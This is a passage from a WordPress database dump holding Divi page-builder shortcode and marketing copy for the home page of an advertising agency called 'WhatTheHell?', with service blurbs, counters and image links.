button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:19:09','2020-08-07 20:19:09','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(610,1,'2020-08-07 20:19:26','2020-08-07 20:19:26','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"217x434\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" 